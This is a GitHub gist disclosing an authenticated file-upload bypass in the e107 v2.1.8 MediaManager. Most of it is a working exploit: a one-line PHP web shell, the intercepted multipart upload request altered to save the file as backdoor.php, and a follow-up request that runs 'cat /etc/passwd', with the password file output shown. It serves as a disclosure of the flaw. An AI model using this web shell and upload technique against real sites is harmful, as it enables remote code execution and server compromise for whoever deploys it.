Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
e107 v2.1.8 MediaManager bypass filetype check


MediaManager of e107 v2.1.8 contains a flaw that is triggered as file types and extensions for uploaded files are not properly validated before being placed in a user-accessible path. This may allow a remote attacker to upload a file and then request it in order to execute arbitrary code with the privileges of the web service.


  1. Login to the admin page (/e107_admin/admin.php) and access MediaManager.

  2. Make a backdoor PHP file named "backdoor.jpg" to bypass JavaScript filter and select it on MediaManeger.

<?php system($_GET['q']) ?>

You can bypass the filetype check because it is filtered by only the extention.

  1. Start upload and rewrite the request body using BurpSuite as follows. On the server side, this file is accepted as a PHP file.
POST /e107/e107_web/js/plupload/upload.php?for=&path= HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2aneEcIB6Abe9JcJ
Cookie: my_cookie=********************
Connection: close
Content-Length: 503

Content-Disposition: form-data; name="name"

Content-Disposition: form-data; name="chunk"

Content-Disposition: form-data; name="chunks"

Content-Disposition: form-data; name="file"; filename="backdoor.php"
Content-Type: image/jpeg

<?php system($_GET['q']) ?>
  1. After importing the uploaded file, the uploaded file is placed in a directory accessible without authentication. Access http://localhost/e107/e107_media/416f4602e3/files/2018-08/backdoor.php?q=cat%20/etc/passwd. The result of OS command execution is displayed.
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

Source Code

Filetype check is processed by a filter on the client side. But, this check can easily be bypassed by rewriting the request.



Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.